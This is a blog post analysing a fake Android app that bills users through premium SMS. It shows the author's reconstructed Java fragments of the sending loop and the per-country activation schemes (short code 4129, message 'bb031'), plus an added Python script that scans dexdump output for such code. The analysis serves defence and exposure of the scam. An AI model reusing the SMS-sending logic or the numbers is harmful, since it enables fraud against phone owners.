
Fraudulent Android applications. Poking the enemy

I'm the developer of an Android application and I track new links to it through a Google subscription. This morning I was happy to find an e-mail in my inbox with a new link to my application. Everything looked perfect: the review is positive, the number of downloads is not 0; only the version is for some reason old and ... the APK is 3 megabytes against the original ~200K.

After downloading and unpacking the APK (remember that an APK is just a ZIP archive), it turned out to be "stuffed" with 153 PNG files (renamed for some reason to .temp) showing the "witness from Fryazino", plus the "application" itself ...

As expected, nothing is left of the original application: no icons, no code. And on closer inspection, it seems that ALL files on androides-os.com are one and the same program! I downloaded several different programs from different sections, and they were all the same size with the same content!
Inside there was something that, after a quick look at its resources, turned out to be an application requesting "activation" by sending an SMS. Let's try to figure out where and what it sends ...



We cannot get pure Java source back from the APK, but we can get the Dalvik VM instructions, which are quite readable by eye without extra tooling. Using the dexdump utility from the Android SDK, we dump the Dalvik instructions into a file ...

dexdump -d -f -h classes.dex > dump.dump 


Since we assume the application sends SMS, we search the dump for the string "sendTextMessage", the SDK method for sending text messages. The search succeeds: there is one occurrence, in the activate() method.

In brief, the main details of the method (obtained by manually "decompiling" the Dalvik instructions):

  // private HashMap<String, ActivationScheme> activationSchemes;
  // private static String CURRENT_ACTIVATION_SCHEME = "1";
  ActivationScheme o = activationSchemes.get(CURRENT_ACTIVATION_SCHEME);
  ArrayList<Pair<String, String>> l = o.list; // first - destination number, second - message text
  for (Pair<String, String> o2 : l) {
      StringBuilder b;
      String sec = String.valueOf(o2.second); // WTF???
      b = new StringBuilder(sec);
      b.append("+");
      String s3 = schemes.get("2"); // private HashMap<String, String> schemes;
      b.append(s3);
      String result = b.toString(); // "pair.second" + schemes["2"]
      String frst = o2.first; // v1
      // mgr is an android.telephony.SmsManager (sendTextMessage is declared there);
      // sentIntent is the PendingIntent.getBroadcast(...) seen in the dump
      mgr.sendTextMessage(frst, null, result, sentIntent, null);
  }


That is, there is a set of "activation schemes", each consisting of a list of string pairs: one element is the number to which the SMS is sent, the other is what is actually sent.
Let's try to find the activation schemes ... in the dump there is a method initActivationSchemes, where you can find the following code:

  ArrayList al = new ArrayList();
  if ("250".equals(currentMCC)) { // MCC == Mobile Country Code
      ArrayList<Pair<String, String>> aP = new ArrayList<Pair<String, String>>();
      Pair<String, String> p = new Pair<String, String>("4129", "bb031");
      aP.add(p);
      p = new Pair<String, String>("4129", "bb031");
      aP.add(p);
      ActivationScheme sc = new ActivationScheme(aP);
      activationSchemes.put(CURRENT_ACTIVATION_SCHEME, sc); // the HashMap from activate()
  }


That is, for Russia (MCC == 250) an activation scheme is created that sends two SMS to number 4129 ... Besides MCC 250, the method also handles other country codes, each with its own activation scheme. For each country a particular premium number has been chosen.
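As an added example (not code from the original post), a small Python script that automates the search described above over a `dexdump -d` style listing: it groups `const-string` literals and `invoke-*` targets by method, reports which methods call `sendTextMessage`, and lists 4-6 digit literals that look like premium short codes. The sample dump below is constructed to mimic dexdump output and is not the real listing from the post; the method names and string values in it are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the style of `dexdump -d` output (not the real dump from the post).
SAMPLE_DUMP = """\
    name          : 'initActivationSchemes'
    type          : '()V'
      |0000: const-string v1, "250" // string@0007
      |0002: const-string v2, "4129" // string@0008
      |0004: const-string v3, "bb031" // string@0009
      |0006: invoke-direct {v4, v2, v3}, Landroid/util/Pair;.<init>:(Ljava/lang/Object;Ljava/lang/Object;)V // method@0003
    name          : 'activate'
    type          : '()V'
      |0000: const-string v0, "+" // string@000a
      |0002: invoke-virtual {v1, v2, v3, v4, v5, v6}, Landroid/telephony/SmsManager;.sendTextMessage:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V // method@0012
    name          : 'onCreate'
    type          : '(Landroid/os/Bundle;)V'
      |0000: const-string v0, "Hello" // string@000b
"""

METHOD_RE = re.compile(r"name\s+:\s+'([^']+)'")
CONST_RE = re.compile(r'const-string(?:/jumbo)? v\d+, "([^"]*)"')
INVOKE_RE = re.compile(r"invoke-[\w/]+ \{[^}]*\}, (L[^;]+;)\.([\w<>]+):")
# 4-6 digit literals; 3-digit values such as the MCC "250" are deliberately left out
SHORT_CODE_RE = re.compile(r"^\d{4,6}$")

def parse_methods(dump):
    """Group const-string literals and invoke targets by the method they appear in."""
    methods = defaultdict(lambda: {"strings": [], "calls": []})
    current = None
    for line in dump.splitlines():
        m = METHOD_RE.search(line)
        if m:
            current = m.group(1)
            continue
        if current is None:
            continue
        c = CONST_RE.search(line)
        if c:
            methods[current]["strings"].append(c.group(1))
        i = INVOKE_RE.search(line)
        if i:
            methods[current]["calls"].append(i.group(1) + "." + i.group(2))
    return dict(methods)

def find_sms_indicators(dump):
    """Methods that call sendTextMessage, plus every short-code-looking literal in the dump."""
    methods = parse_methods(dump)
    senders = [n for n, m in methods.items() if any(c.endswith(".sendTextMessage") for c in m["calls"])]
    short_codes = sorted({s for m in methods.values() for s in m["strings"] if SHORT_CODE_RE.match(s)})
    return {"senders": senders, "short_codes": short_codes}
```

On a real dump the short-code list will contain false positives (years, resource ids), so treat it as a triage hint to be read alongside the SEND_SMS permission in the manifest, not as a verdict.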

There is one puzzling thing. Although 250 is Russia, number 4129 (at least according to the information I could find) looks up as Ukrainian. Maybe I made a mistake while "decompiling" and accidentally "wrote down" the Ukrainian codes in the Russian block ...

Now, what the application looks like ...
Let's install it:


At startup, everything is very straightforward:


There is even an "offer":


The same “offer” seems to be available here: http://depositfmobi.ru/ofert
I found the site from the application's package name: com.depositmobi.

Interestingly, it is depositmobi, "QIP.Files" and "Rapidshare" all at the same time!

So what's the bottom line? A very simple fraud scheme: make a website, pump up its SEO with the right keywords, fill it with themed news and with the simplest program for sending SMS to premium numbers, and supply it with an "offer" to cover your ass ... Is there any legal way to deal with such comrades?

Source: https://habr.com/ru/post/129138/
